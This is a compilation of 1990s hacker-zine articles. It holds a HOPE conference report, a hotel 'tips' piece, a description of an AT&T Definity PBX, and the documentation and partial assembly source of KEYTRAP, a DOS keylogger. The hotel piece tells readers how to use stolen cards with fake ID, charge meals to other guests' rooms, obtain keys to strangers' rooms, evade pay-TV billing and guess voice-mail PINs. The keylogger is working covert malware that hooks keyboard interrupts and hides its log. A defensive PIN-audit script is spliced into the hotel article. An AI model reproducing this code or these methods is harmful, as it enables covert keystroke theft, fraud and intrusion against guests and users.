using my Cable and Wireless long distance access card and entered
the PIN and to my surprise, an automated voice came on and said,
"Sorry, you entered your PIN with the wrong finger. Please try
again."


Sprint says they’ve solved this thorny cumbersome problem with a
service called "The Voice Fone Card". Instead of memorizing
another 64 digit long PIN, you just speak into the phone: "Hey
it’s me. Give me dial tone or give me death." The voice recognition
circuits masturbate for a while to determine if it’s
really you or not.


Good idea. But according to Strat, not a good execution. Strat
found that someone performing a poor imitation of his voice was
enough to break through the front door with ease. Even a poor
tape recording played back over a cheap cassette speaker was
sufficient to get through Sprint’s new whiz-banger ID system.


Strat laughed that Sprint officials said in defense, "We didn’t 
say it was secure: just convenient." 


Smart. Oh, so smart. 


* * * * *


"If my generation of the late 60’s and early 70’s had had the
same technology you guys have there never would have been an
80’s." This was how I opened my portion of the author’s panel.


The authors panel was meant to give HOPE hackers insight into how
they are perceived from the so-called outside. I think the
session achieved that well, and I understand the videos will be
available soon.


The question of electronic transvestites on AOL came up to everyone’s
enjoyment, and all of us on the panel retorted with a big,
"So what?" If you have cyber-sex with someone on the ’Net and
enjoy it, what the hell’s the difference? Uncomfortable butt
shifting on chairs echoed how the largely male audience likely
feels about male-male sex regardless of distance.


"Imagine," I kinda said, "that in a few years you have a body
suit which not only can duplicate your moves exactly, but can
touch you in surprisingly private ways when your suit is connected
to another. In this VR world, you select the gorgeous woman
of choice to virtually occupy the other suit, and then the two of
you go for it. How do you react when you discover that like
Lola, ‘I know what I am, and what I am is a man and so’s Lola.’"
Muted acknowledgment that unisex may come to mean something
entirely different in the not too distant future.


"Ooh, ooh, please call on me." I don’t mean to be insulting, but 
purely for identification purposes, the woman behind the voice 
bordered on five foot four and four hundred pounds. Her bathtub 
had stretch marks. 


I never called on her but that didn’t stop her. 


"I want to know what you think of how the democratization of the
internet is affected by the differences between the government
and the people who think that freedom of the net is the most
important thing and that government is fucked but for freedom to
be free you have to have the democracy behind you which means
that the people and the government need to, I mean, you know, and
get along but the sub culture of the hackers doesn’t help the
government but hackers are doing their thing which means that the
democracy will not work, now I know that people are laughing and
giggling (which they were in waves) but I’m serious about this
and I know that I have a bad case of hypomania but the medication
is working so it’s not as bad as it could be. What do you think?"


I leaned forward into the microphone and gave the only possible
answer. "I dunno. Next." The thunderous round of applause
which followed my in-depth response certainly suggested that my
answer was correct. Not politically, not technically, but
anarchistically. Flexibility counts.


* * * * *


HOPE was attended by around one thousand folks, and the Hotel
Filthadelphia still stands. (Aw shucks.)


My single biggest complaint was not that the schedules slipped by
an hour or two or three; sessions at conferences like this keep
going if the audience is into them and they are found to be
educational and productive. So an hour session can run into two
if the material and presentations fit the mood. In theory a
boring session could find itself kama kazi’d into early melt-down
if you have the monotone bean counter from hell explaining the
distributed statistical means of aggregate synthetic transverse
digitization in composite analogous integral fruminations.
(Yeah, this audience would buy off on that in a hot minute.) But
there were not any bad sessions. The single track plenary style
attracted hundreds of hackers for every event. Emmanuel and
friends picked their panels and speakers well. When dealing with
sponge-like minds who want to soak up all they can learn, even in
somewhat of a party atmosphere, the response is bound to be good.


My single biggest complaint was the registration nightmare. I’d
rather go to the DMV and stand in line there than get tagged by the
seemingly infinite lines at HOPE. At DefCon early registration
was encouraged and the sign up verification kept simple.


For some reason I cannot thoroughly (or even partially) fathom, a 
two step procedure was chosen. Upon entering, and before the 
door narcs would let anyone in, each attendee had to be assigned 
a piece of red cardboard with a number on it. For the first day 
you could enter the ’exhibits’ and auditorium without challenge. 
But by Day 2 one was expected to wait in line for the better part 
of a week, have a digital picture taken on a computer tied to a 
CCD camera, and then receive a legitimate HOPE photo-ID card. 
What a mess. I don’t have to beat them up on it too bad; they 
know the whole scheme was rotten to the core. 


I waited till near the end of Day 2 when the lines were gone and 
the show was over. That’s when I got my Photo ID card. I used 
the MIB’s photo ID card the rest of the time. 


HOPE was a lot of fun and I was sorry to see it end, but as all
experiences, there is a certain amount of letdown. After a great
vacation, or summer camp, or a cruise, or maybe even after Woodstock,
a tear welts up. Now I didn’t cry that HOPE was over, but
an intense 48 hours with hackers is definitely not your average
computer security convention that only rolls from 9AM to Happy
Hour. At a hacker conference, you snooze, you lose. You never
know what is going to happen next - so much is spontaneous and
unplanned - and it generally is highly educational, informative
and entertaining.


Computer security folks: you missed an event worth attending.
You missed some very funny entertainment. You missed some fine
young people dressed in some fine garb. You missed the chance to
meet with your perceived ’enemy’. You missed the opportunity to
get inside the heads of the generation that knows more about
keyboards than Huck Finning in suburbia. You really missed
something, and you should join Robert MIB Steele and I at the
next hacker conference.


* * * * *


If only I had known.

If only I had known that tornadoes had been dancing up and down
5th avenue I would have stayed at the Hotel Filthadelphia for
another night.


La Guardia airport was closed. Flights were up to 6 hours delayed
if not out and out canceled. Thousands of stranded travelers
hunkered down for the night. If only I had known.


Wait, wait. Hours to wait. And then, finally, a plane ready and 
willing to take off and swerve and dive between thunderbolts and 
twisters and set me on my way home. 


My kids were bouncing out of the car windows when my wife picked 
me up at the airport somewhere in the vicinity of 1AM. 


"Not too late are you dear?" Sweet Southern Sarcasm from my 
Sweet Southern Wife. 


"Don’t blame me," I said in all seriousness. "It was the hackers.
They caused the whole thing."


* * * * *


Notice: This article is free, and the author encourages responsible
widespread electronic distribution of the document in full,
not piecemeal. No fees may be charged for its use. For hard
copy print rights, please contact the author and I’ll make you an
offer you can’t refuse. The author retains full copyrights to
the contents and the term Cyber-Christ.


Winn is the author of "Terminal Compromise", a novel detailing
a fictionalized account of a computer war waged on the United
States. After selling well as a book-store-book, Terminal Compromise
was placed on the Global Network as the world’s first
Novel-on-the-Net Shareware and has become an underground classic.
(Gopher TERMCOMP.ZIP)


His new non-fiction book, "Information Warfare: Chaos on the
Electronic Superhighway" is a compelling, non-technical analysis
of personal privacy, economic and industrial espionage and
national security. He calls for the creation of a National
Information Policy, a Constitution in Cyberspace and an Electronic
Bill of Rights.


He may be reached at INTER.PACT, 11511 Pine St., Seminole, 
FL. 34642. 813-393-6600, fax 813-393-6361, E-Mail: 
POO0506@psilink.com. 
The ABCs of better HOTEL Staying


by SevenUp (sec@escape.com) 


This ARTICLE will give you some information on how to experience
a cheaper, safer, and more comfortable stay at your next hotel visit.
Always keep in mind that the staff is taught to make your stay
as pleasant as possible and fulfil most of your wishes. So it is often
a matter of social engineering to reach your goal.


BUSINESS CENTRES

Many good hotels offer business centres. Some business centres just offer
"typing service" at high rates, others provide a PC you can use for free.
Usually it is a 286 or older, but it should give you the opportunity
to copy warez, write your latest article for Phrack or even connect your
pocket modem and login to the -> Internet.


CREDIT CARDS 

If you have your own card and don’t mind paying for the room - great!
Just use it when you check in - most places require you to have a credit
card or won’t let you use the phone or won’t even let you in.

You want to use someone else’s card? Be careful! Don’t use a stolen
card when you check in, or you won’t have a safe sleep, fearing that they
could come and get you. You would be safer if you tell them upon check in
that you misplaced your card and don’t need to make long distance calls,
and just want to pay with it in the end. This doesn’t work always, but
sometimes. You also need a faked ID upon check in with the same name as
the cardholder.


But overall, using a faked Credit Card in a hotel is one of the easiest ways
to get busted.


DIALUPS

Many hotels have dialins for their reservation system. Novells are quite
popular. Some hotels also use PC based UNIXes (old System V’s mostly)
that are often unprotected - no passwords on the root account or even
giving you a shell prompt when you call the dialup. Most of them are 7E1
at slow speeds. I won’t say more about reservation systems here.


EATING & DANCING 

Many hotels have good and relatively expensive restaurants and discos. 
They just require you to sign the check with a room number and full name. 
If you know of a guest that is checked in and has secured his account with 
a credit card who just checked in, just use his name and room number - 
this is probably the biggest lack of security in a hotel. 


Also if you don’t stay at the hotel but want to go to their disco at night, 
pretend to be a guest to get in free and save cover charges. They usually 
believe you. 


FUCKING 

You've read right, hotels are favorite places to make love. No matter 
if you bring your IRC date here, pick up a hooker or stay alone and 
watch the in-house porn movies. Since many hotels pride themselves in 
having as much staff as guests, the question is how to get the cute 
waitresses and maids into your bed. If anyone has experience making 
them willing without much financial and physical effort, drop me a 
mail and I will include it in the next list. 


GET ALL
Some people love to take all movable parts from the room before checking
out. The question is what to take and what not.


The easiest things to take are soaps, shampoo, lotions and Kleenex from
the bathroom, since they will be replaced every morning without problems.
If you want a bathrobe (usually most expensive item), hide it in your
suitcase immediately after check in and then complain that there was just
one robe in your room. They will bring you a new one immediately. If you
take one when you leave the hotel, they will notice and most likely
charge you $100 in your credit card. If you want a bath towel, also don’t
wait until the end of your stay, but hide it some days earlier. If anyone
should ask about it, just tell him that you left it at the pool.

Taking magazines from your room is usually no problem, but stay away
from removing the TV or blankets!


HYATT GOLD PASSPORT
If you want to check in at a Hyatt, get yourself their Gold Pass before.
It is free of charge and will get you free Orange Juice, Coffee and a
newspaper in the morning, and also a bigger room.


INTERNET
So you are at a hotel in a new city and want to get on the Internet?
There are usually 2 ways: Using a computer and a modem from your hotel room
and calling a dialup, or walking to a local university and logging in from
there.


If you bring your laptop with built-in modem, find the dialup in the
Internet Dialup list in this issue of Phrack, get an account on the host
and can make free local calls from your room, the first choice is probably
the best one.


But if you don’t have your own account at a local school and want to
stay legit, it is often useful to walk to a computer lab in that school
and check out their computers. Many schools around the world have PC’s
in their labs which let you do a telnet throughout the world without
needing any account or password, or ID to enter the school. You can find
them in Hong Kong, New York, Munich and many other major cities; but usually
they are unknown to the public or are likely to be closed down (similar to the
vending machines, see -> SEVENUP).


JACKING OFF
See -> Fucking.


KEY

There are plenty of different types of room keys. Some hotels still use
old-fashioned standard keys, but most use programmable keys (plastic cards
with "holes" or magnetic stripes, or even the pretty modern metal keys
in key-shape, which allow programming of their magnetic fields). These
programmable keys will always be reprogrammed if a guest checks out.

On the other hand, if you go to the reception and claim that you lost
your key, they will always program a spare key for you. Sometimes they
ask you for your birthday, sometimes for your ID (just tell them you
left it in your room). This way you could easily get into someone else’s
room.


LIGHT 

Some hotels have quite fancy light systems. If the light won’t shine, 
there is often a box in the entrance where you have to enter your key 
(or some paper) to activate the main power. This should help saving 
energy while you are gone, but sometimes even the air condition will 
turn off, so you have to fool the box with a paper or spare key. 

Some systems will turn on certain lights just when you insert the key
into the door and open it. This is quite unfortunate if your roommate
sleeps while you go cruising and clubbing at night. When you return,
the light will shine bright and wake him up. The only thing that helps
is unscrewing the light bulbs.


MOVIES & TV
I bet many of you will first turn on the TV after entering the room.
Some people just stay at hotels that offer HBO in their rooms.

Before playing with the remote, read the papers above the TV carefully,
because some channels might show in-house movies that are being charged
automatically without any warning. Typical rates are US $6-9 per movie.
Of course you don’t want to pay that much, nor do I.


Here are the 3 big S’ of movie watching: 
Spectravision, Sex movies and Social Engineering. 


Spectravision is one of the most popular systems. It usually allows you
to watch 5 minutes (sometimes 2) of each movie per day free, enough for
some people to come. There are usually a bunch of BNC cables from the
wall to your Spectravision box and to your TV. One of the cables delivers
the program, the other assures billing. Use your fantasy and try replacing
the "billing cable" in the wall! Generally it can also be useful to use
a standard cable decoder (cablebox) to decode the pay channels. Just bring
one along and if you are lucky, you can watch the movies easily.


If all your technical expertise fails, there is still one way of watching
movies for free: Social Engineering. Just watch the movies of your choice
and then complain to the reception that you had trouble with the TV,
that the Spectravision box or remote control broke, or that you caught
the maid watching movies in your room. If you cry a lot, they will usually
be nice and remove the movies from your bill.


PHONE CALLS 

Be careful before making any phone calls from your room. Many hotels
charge you up to $3 for 800 numbers and log all your touch tones (and
calling codez!). You can’t be sure who will view the logs and abuse your
calling card. Also there are often high surcharges for long distance calls,
up to 40% on top of AT&T’s operator connected charges. There are also hotels
that charge a minimum charge per call (up to $5), even if you just talked
for 10 seconds long distance. On the other side, some hotels offer free local
and 800 calls. Just make sure and read all papers in the room and contact
the reception. I also had operators telling me lower rates than the ones that
showed up on my bill, so be careful.


RACK RATE
This is the highest possible rate for a room, and the rate that is officially
displayed at the reception. You should never pay that rate. If you say you
are with a company they will give you a discount of at least 10% (corporate
rate). Some hotels even give qualified people and companies discounts of
25% - 50% on the rack rate. When you wonder if you pay too much for your
room or think you got a great rate, send me a mail, because I try to keep
a database about cheapest prices for selected hotels.


SEVENUP, Coke, Pepsi & Rootbeer: 

You are staying at a five-star hotel. You are thirsty. Your room has
a minibar, but the cheapest soda is $4.95. The next supermarket or gas
station is 20 miles away. But you need a Coke. What to do now?


TRY finding the gangways where the employers work, live and eat!
About every bigger hotel has a kitchen for employees. They also have
a vending machine hidden somewhere, with sodas for just 60 cents.


When strolling through the restricted area, just walk straight, slowly
and self confident. If someone asks you what you are doing, tell them:

a) you are an undercover agent for the IRS and they should get lost.

b) you are looking for the vending machine. (telling the truth openly
   with a broad smile can be more successful than you think!)

c) you are a new employee and ask her to show you around


Also notice the signs and posters in most restricted areas, telling 
the personnel to be "enthusiastic, punctual, generous to the guest..." 
Quote these phrases when an employer behaves nasty towards you. 


UPGRADES
After first going into your room and checking it out, go back to
the reception and complain that the bed is too small, the street noise
is too loud, the view is too poor, etc. Quite often they will give you
a nicer and bigger room on their executive floor! See also -> Hyatt
Gold Passport.


VOICE MAIL

Many good hotels offer voice mail to their guests. The most popular
system is Meridian Mail. Some hotels have an own dialup for the voicemail,
but mostly the hotel just lets you access it through the main PBX operator.
If you are unlucky you have to wait 5 rings at a number before the
Voice Mail answers.


Most guests don’t use Voice Mail. The few that do also keep the default
password, which is often the room number or the birthday of the guest.
One way to get the birthday is call up front desk, tell them you are
with "Mommy’s Birthday Cakes Delivery" and have a cake for John Smith.
Ask them to check birthdays of all John Smiths etc. Of course there
are more ways, just use your social engineering fantasy!
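

A check a hotel's PBX or voice-mail administrator could run against the
weakness described above (PINs left at the room number or the guest's
birthday), as an added example that is not part of the original article.
The Mailbox record layout and the sample data are assumptions constructed
for illustration, not an export format of Meridian Mail or any real system.

```python
"""Flag hotel voice-mail PINs that match the guessable defaults named above.

All mailbox records in SAMPLE are constructed for this example.
"""
from dataclasses import dataclass
from datetime import date


@dataclass
class Mailbox:
    room: str        # room / extension number as dialled
    guest_dob: date  # birthday held in the front-desk record
    pin: str         # PIN currently set on the mailbox


def birthday_variants(dob):
    """Numeric strings commonly derived from a birthday (MMDD, DDMM, ...)."""
    d, m, y = f"{dob.day:02d}", f"{dob.month:02d}", f"{dob.year:04d}"
    yy = y[2:]
    return {m + d, d + m, m + d + yy, d + m + yy, m + d + y, d + m + y,
            y, yy + m + d, y + m + d}


def is_trivial(pin):
    """Single repeated digit (0000) or a straight run (1234, 4321)."""
    if len(set(pin)) == 1:
        return True
    steps = {int(b) - int(a) for a, b in zip(pin, pin[1:])}
    return steps in ({1}, {-1})


def audit(mailboxes):
    """Return {room: [reasons]} for every mailbox with a guessable PIN."""
    findings = {}
    for mb in mailboxes:
        reasons = []
        if not mb.pin.isdigit():
            reasons.append("non-numeric or empty PIN")
        else:
            # Compare without leading zeros so 0733 and 733 count as equal.
            if mb.pin.lstrip("0") == mb.room.lstrip("0"):
                reasons.append("PIN equals room number")
            if mb.pin in birthday_variants(mb.guest_dob):
                reasons.append("PIN derived from guest birthday")
            if is_trivial(mb.pin):
                reasons.append("trivial PIN")
        if reasons:
            findings[mb.room] = reasons
    return findings


# Constructed sample records (not real guests or rooms).
SAMPLE = [
    Mailbox("1204", date(1961, 3, 17), "1204"),    # default: room number
    Mailbox("0815", date(1958, 11, 2), "1102"),    # birthday as MMDD
    Mailbox("2210", date(1970, 7, 4), "4321"),     # descending run
    Mailbox("0417", date(1949, 12, 25), "907356"), # unrelated PIN
    Mailbox("0733", date(1980, 1, 9), "733"),      # room number, zero dropped
]

if __name__ == "__main__":
    for room, reasons in sorted(audit(SAMPLE).items()):
        print(f"room {room}: {', '.join(reasons)}")
```

Forcing a PIN change at check-in and rejecting any PIN this audit flags
removes the default the paragraph above relies on.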


WHERE TO GO? 

It is pretty hard to recommend chains in general. But I had quite 
good experience with Hilton, Hyatt (try getting a room on the Regency 
floor), Holiday Inn (sometimes really cheap prices and good standard), 
Shangri-La (best hotels in Asia) and Marriott (usually nice service). 
I had less good experience with Sheraton (less discounts), Peninsula, 
Regent & Four Seasons (all a bit overpriced and not so modern). But 
there are always exceptions, so tell me about your experience! 


I hope some of these tips might be useful for you. Stay tuned and wait 
for a new issue of travel tips, next time about Airlines! 


(c)opyright 1994 by the author. Publication outside of Phrack forbidden. 
AT&T Definity System 75/85
Communications System 
Description & Configuration 


Written By: erudite 
(armitage@dhp.com) 


Let me introduce you to the AT&T Definity System 75/85. This communications
system is a product of the merging of the AT&T System 75 and System 85
architectures. The name Definity came from the two words "definitive" and
"infinity".


Let me also tell you that there are many different communications systems 
out there. (Merlins, AT&Ts) Many many many, I couldn’t name them all, but 
the AT&T systems are nice. I enjoy working with them, and I hope you enjoy 
this text file. 


This System is an advanced business communications system. A Digital 
Communications Protocol (DCP) allows data communication through data 
terminal equipment connected to the digital switch. This allows the 
system to handle data and voice communications simultaneously. 


The System can handle up to 1600 lines and supports all digital, hybrid,
and analog terminals and equipment, with up to 400 trunks and up to 400
Automatic Call Distribution (ACD) Agents. The data switching capacity is up
to 800 digital data endpoints, and 160 integrated and combined pooled modem
facilities.


- 510D Personal Terminal or 515-Type Business Communications Terminal
- 7404D Terminals
- 7406D or 7407D Equipped with optional Data Module Base
- Asynchronous Data Units (ADU) (DCE type device that has rs232c interface)
- Digital Terminal Data Modules
- 3270 Data Modules
- Internal Data Channels
- Trunk Data Modules (Modular)
- Processor Data Modules (Modular)


The Processor Port Network (PPN) always provides the switch processing
element (SPE) and port circuits. An Expansion Port Network (EPN) is
available to increase line size of any system by allowing you to add
additional port circuits. The EPN connects to the PPN over a fiber
optic cable that may be up to 1.86 miles remotely situated. It may also
be located adjacent to the PPN.


This System may be arranged stand-alone or you can integrate it into a 
private network. You can form these types of Networks: 

Tandem Tie Trunk Network (TTTN) 
Electronic Tandem Network (ETN) 
Main/Satellite Configuration 
Distributed Communications System (DCS) 
Centralized Attendant Service (CAS) 




An Integrated Services Digital Network Primary Rate Interface (ISDN-PRI)
makes it possible for the Definity System to access various private and
public network services. With ISDN-PRI you can access these services:

- Call by Call Service Selection
- Private Network Services
- Information Forwarding
- Call Identification Display
    - Connected Number Display
    - Connected Party Name Display
    - Calling and Called Number Record Display
    - Calling and Called Party Name Display


Configuration 


The Actual System is encased in a pair of "cabinets" which have a fiber 
optic link between them. It is also common to have a stack of about three 
"cabinets" of a smaller size, for different models. 


Shown here is a typical multi-carrier system with a Processor Port Network 
(PPN) cabinet and Expansion Port Network (EPN) cabinet. 


[Diagram: two AT&T DEFINITY SYSTEM 75/85 cabinets joined by a fiber optic 
connection. Labelled attachments: attendant consoles, outside trunks and 
lines, outside private line data transmission equipment or analog switched 
network, business communication terminals, audix, modular data processor, 
manager terminal, optional host computer or call management system, 
asynchronous data unit, single line voice terminals, data terminals.] 


Voice and Data 
Management Features 


There are too many voice features and services to list, so I will run down 
the interesting and useful ones. The system has many Voice Management, Data 
Management, Network Services, System Management, Hospitality Services, and 
Call Management Services. 


call attendant can use to operate the console more efficiently 

both inside system users and remote callers to edit, receive, send, 

write, and forward voice messages. 

system. 

it to the display console. 

—- Attendant Conference: Allows Attendant to construct a conference call 

- Terminal Conference: Allows remote user to construct a conference call 

without attendant assistance. 

being interrupted by any of the systems overriding features, and denies 

ability to gain access to, and or superimpose tones. 

is issued by the administrator to a certain extension # for indication of 

a dedicated private data extension. 

the system to dial anyone else, such as the attendant console. 

the following trunks and more. 
Voice Grade DS1 Tie Trunks 
Alternative Voice/Data (AVD) DS1 Tie Trunks 
Digital Multiplexed Interface (DMI) Tie Trunks 
Central Office (CO) Trunks 
ISDN-PRI Trunks 
Remote Access Trunks 
Wide Area Telecommunications Service (WATS) Trunks 

features and functions that is used for maintenance testing. Such as access 
to system tones, access to specific trunks, etc. 

Note: AT&T designed the Facility Test Calls Feature for testing 
purposes only, and system maintenance. When properly 
administered, AT&T claims that the customer is responsible for 
all security items, and secure system from unauthorized users, 
and that all users should be aware of handling access codes. 
AT&T claims they will take no responsibility for poor 
administration. 

it rings down if busy, or if it receives a dial timeout. 
packet switched local area network that will link with mainframes, 
workstations, personal computers, printers, terminals, storage devices, 
and communication devices. 
This interface allows connection of the system to an ISDN Network by means 
of ISDN frame format called PRI. 
branch has a Listed Directory Number (LDN). 

Common Control Switching Arrangement (CCSA) 
Electronic Tandem Network (ETN) 
Enhanced Private Switched Communications Service (EPSCS) 
Tandem Tie Trunk Network (TTTN) 
Software Defined Network (SDN) 
doesn’t want to take responsibility for anything that is abused with this 
feature. 
would come in handy. 
others calls, again, AT&T does not want to take any legal fees on misuse 
on this feature. 
attendant’s assistance. 


The System comes with switched services software, administrative software, 
and maintenance software, all running on a real-time operating system. 


and services. This also is responsible for relaying any information to the 
console display. 

tasks, and configurations. 

keep everything running properly. 


System Administration 


The "Access Code" you will encounter on these systems is a 1, 2, or 3 digit 
number. The pound (#) and star (*) keys can be used as the first digit of the 
code. Below is a typical screen format taken from one of my logs. The 
information aside, you can see and get a feel for what the administration 
side of the system is like. 

Page 1 of 4 

                              STATION 
Extension: 
Type:            Lock Messages: _     COR: _     Room: 
Port:            Security Code:       COS: _     Jack: 
Name:            Coverage Path:                  Cable: 

FEATURE OPTIONS 
LWC Reception?             Headset? _           Coverage Msg Retrieval? _ 
LWC Activation? _          Auto Answer? _       Data Restriction? _ 
Redirect Notification? _   Idle Appearance Preferences? _ 
PCOL/TEG Call Alerting? _ 
Data Module? _             Restrict Last Appearance? _ 
Display? _ 

ABBREVIATED DIALINGS 
List1:           List2:           List3: 

BUTTON ASSIGNMENTS 


System Maintenance 


Finally, the Maintenance section, where you can see where the errors are 
logged, where all the alarms are sent, printed, etc. 


There are 3 different types of alarms: 
console or INADS) 


The Error log is reported and can be viewed at The Manager Terminal, 
as well as the alarm log. 


Basic Acronyms 


ADU     Asynchronous Data Unit 
AUDIX   Audio Information Exchange 
COR     Class of Restriction 
COS     Class of Service 
DCP     Digital Communications Protocol 
DMI     Digital Multiplexed Interface 
EPN     Expansion Port Network 
ISDN    Integrated Services Digital Network 
PPN     Processor Port Network 
PSDN    Packet Switching Data Network 


Tones 


Here are most of the tones, mostly the interesting or often-used tones of 
the System, with their frequencies and modulations. 


Tone                     Frequency            Pattern 
Answer Back 3            2225 Hz              3000 on 
Answer Back 5            2225 Hz              5000 on 
Bridging Warning         440 Hz               1750 on, 12000 off, 
                                              650 on; repeated 
Busy                     480 Hz + 620 Hz      500 on, 500 off; repeated 
Call Waiting 
  Internal               440 Hz               200 on 
  External               440 Hz               200 on, 200 off 
  Attendant              440 Hz               200 on, 200 off 
  Priority Call          440 Hz               200 on, 200 off, 200 on, 
                                              200 off, 200 on 
Call Waiting 
  Ring Back              440 Hz + 480 Hz;     900 on (440 + 480) 
                         440 Hz               200 on (440) 2900 off; repeated 
Cnrt Att Call 
  Incoming Call 
  Identification         480 Hz & 440 Hz      100 on (480), 100 on (440), 
                         & 480 Hz             100 on silence; 
Dial Zero, 
  Attendant Transfer, 
  Test Calls,            440 Hz               100 on, 100 off, 100 on 
Coverage                 440 Hz               600 on 
Confirmation             350 Hz + 400 Hz      100 on, 100 off, 100 on, 
                                              100 off, 100 on 
Dial                     250 Hz + 400 Hz      Continuous 
Executive Override       440 Hz               300 on followed by 
Intercept                440 Hz & 620 Hz      250 on (440), 
                                              250 on (620); repeated 
Ringback                 440 Hz + 480 Hz      1000 on, 3000 off; repeated 
Zip                      480                  500 on 


Outro 


System 75/85 (multi-carrier cabinet model) communications system. 


I hope you learned something, anywayz, questions comments, system login 
information, defaults, where to get manuals, or anything else: 
email me (armitage@dhp.com) and I will get back to you. 




erudite (armitage@dhp.com) (armitage on irc) 


KEYTRAP v1.0 - Keyboard Key Logger 
by Dcypher (Dcypher@aol.com) 


THIS PROGRAM MAY NOT BE DISTRIBUTED IN ANY WAY THAT VIOLATES U.S. OR 
FOREIGN LAW. THIS PROGRAM MUST NOT BE USED TO GAIN UNAUTHORIZED ACCESS 
TO DATA AND IS NOT INTENDED TO HELP USERS TO VIOLATE THE LAW ! 




You may distribute UNMODIFIED copies of KEYTRAP freely, subject to the 
above limitations, and provided all files are included in unmodified 
form; KEYTRAP.EXE, KEYTRAP.DOC 


The author disclaims ALL warranties relating to the program, whether 
express or implied. In absolutely no event shall the author be liable 
for any damage resulting from the use and/or misuse of this program. 


WHAT IS KEYTRAP ? 


KEYTRAP is a very effective keyboard key logger that will log 
keyboard scancodes to a logfile for later conversion to ASCII 
characters. Keytrap installs as a TSR, remaining in memory 
until the computer is turned off. 


CONVERT will convert the keyboard scancodes captured by Keytrap 
to their respective keyboard (ASCII) characters. 


Usage: KEYTRAP <dir\logfile> /A /B /C 


A - Maximum size of logfile 
B - Number of keys to log per session 
C - Number of minutes between each session 


Keytrap is a command line program. 


<dir\logfile> - You MUST specify a directory for the logfile. 
If you don’t specify a directory Keytrap will only look in the 
current directory for the logfile. If the logfile is not found 
in the current directory no writing will occur. Keytrap will 
append the scancode data to the end of the file you specify. 


A - The Maximum size of the logfile. This number is checked only 
when Keytrap is installed. If the size of the logfile exceeds this 
number, Keytrap will delete the logfile and create a new one. 


B - This is the number of keys to log per session. Keytrap will 
only check this number AFTER a write to the logfile. So if you 
specify 50 keys, and Keytrap does not get a chance to write till 
there are 100 keys in the buffer, then Keytrap will log 100 keys. 


C - This is the number of minutes between each session. When Keytrap 
reaches or exceeds the number of keys to log per session, it will 
start a delay routine and check this number. You can't specify more 
than 1440 minutes, the number of minutes in a day! 


Example: KEYTRAP c:\logfile /20000 /200 /20 

Keytrap will check "logfile" to see if it exceeds 20,000 
bytes. If it does, Keytrap will delete the log file and then 
create a new one. Keytrap will then install as a TSR program. 
It will log approx 200 keys at a time with a delay of 20 minutes 
between each session. 


Usage: CONVERT logfile outfile 


logfile: The file that contains the scancodes that Keytrap logged. 
outfile: Specify an output file name. 


There's not too much to say here. This program just converts scancodes 
from the logfile into their respective keyboard (ASCII) characters. 


Keytrap will not display ANY messages. Check the logfile and 
the size of the logfile if you're not sure Keytrap is working. 


Keytrap will only make the logfile hidden if the logfile is 
actually created by Keytrap or the maximum size of the logfile 
is reached or exceeded. If you specify a file that already 
exists then Keytrap will not change that file's attributes and 
will append all scancode data to the end of the file. 


Keytrap will not crash if the logfile gets deleted while Keytrap 
is in memory. It will just keep looking for the logfile so it can 
write its buffer. A buffer write is not forced until the buffer 
reaches 400 bytes. It will then try to write its buffer during 
the next interrupt 21 call. 


If you have any questions or need some help, mail me. 
Below is my public pgp key, don’t e-mail me without it ! 


Dcypher (Dcypher@aol.com) 


; KEYTRAP v1.0 - Keyboard Key Logger 
; By Dcypher (Dcypher@aol.com) 
; 
; Usage: KEYTRAP <dir\logfile> /A /B /C 
; 
;        A - Maximum size of log file. 
;        B - Number of keys to log per session. 
;        C - Minutes between each session. 
; 
.286                                    ; 286 or better 
.model small                            ; 
.code                                   ; 
org     100h                            ; 
; 
begin:  jmp     install                 ; 
; 
db      ' DCYPHER@AOL.COM / KEYTRAP V1.0 '   ; PLEASE DON'T REMOVE 
; 
buf             db 401 dup (0)          ; 400 byte buffer 
bufptr          dw 0                    ;  +1 for luck :) 
; 
hide            db 0                    ; save int21 function call 
stimem          dw 0                    ; grab time when done 
handle          dw 0                    ; logfile handle 
control         db 0                    ; control which INT to use 
done_flag       db 0                    ; session done flag 
must_write      db 0                    ; must-write flag 
write_amount    dw 0                    ; amount written to disk 
using_21        db 0                    ; already doing an int-21 
; 
old_9a_off      dw 0                    ; 
old_9a_seg      dw 0                    ; 
; 
old_9b_off      dw 0                    ; 
old_9b_seg      dw 0                    ; 
; 
old_21_off      dw 0                    ; 
old_21_seg      dw 0                    ; 
; 
datasegm        dw 0                    ; save data-segment 
; 
delaym          dw 0                    ; delay, in minutes 
mkeys           dw 0                    ; maximum number of keys 
logH            dw 0                    ; log file size 
logL            dw 0                    ; log file size 
; 
int_9A:     pushf                       ; 
            pusha                       ; 
            push    es                  ; 
            push    ds                  ; 
            mov     ds, datasegm        ; we are here 
; 
            cmp     control, 1          ; use this one ? 
            je      A91                 ; 
            call    pkey                ; process key (scancode) 
; 
A91:        pop     ds                  ; 
            pop     es                  ; 
            popa                        ; 
            popf                        ; 
            jmp     dword ptr old_9a_off ; 
; 
pkey:       cmp     done_flag, 1        ; completely done ? 
            je      pk2                 ; 
            cmp     bufptr, 400         ; buffer limit reached ? 
            jae     pk2                 ; 
; 
            in      al, 60h             ; get scancode 
; 
            cmp     al, 39h             ; get downstroke and only 
            ja      pk2                 ; as far as spacebar 
            cmp     al, 2Ah             ; 
            je      pk2                 ; no shift 
            cmp     al, 36h             ; 
            je      pk2                 ; no shift 
; 
            push    0                   ; 
            pop     es                  ; 
            mov     ah, byte ptr es:[417h] ; shift status 
            test    ah, 43h             ; test for both shift keys 
            je      pk1                 ; and cap-lock active 
; 
            add     al, 80h             ; show shift or cap-lock 
pk1:        mov     di, bufptr          ; in logfile 
            mov     buf[di], al         ; place scancode in buffer 
            inc     di                  ; 
            mov     bufptr, di          ; 
            mov     must_write, 1       ; try to write buffer 
; 
pk2:        ret                         ; 
; 
int_9B:     pushf                       ; 
            pusha                       ; 
            push    es                  ; 
            push    ds                  ; 
            mov     ds, datasegm        ; we are here 
; 
            cmp     control, 0          ; use this one ? 
            je      B91                 ; (not really needed) 
            call    pkey                ; process a key (scancode) 
; 
B91:        pop     ds                  ; 
            pop     es                  ; 
            popa                        ; 
            popf                        ; 
            jmp     dword ptr old_9b_off ; 
; 
int_21:     pushf                       ; 
            pusha                       ; 
            push    es                  ; 
            push    ds                  ; 
            mov     ds, datasegm        ; here we are 
; 
            cmp     ax, 0ffffh          ; check if already installed 
            je      D21                 ; 
; 
            cmp     using_21, 1         ; might need to call an 
            je      C21                 ; int-21 here so jump if 
            mov     using_21, 1         ; called from below 
            mov     hide, ah            ; save function # for hiding 
; 
            call    switch              ; always control the int 9's 
            call    timer               ; always check restart timer 
; 
            cmp     done_flag, 1        ; completely done ? 
            je      B21                 ; 
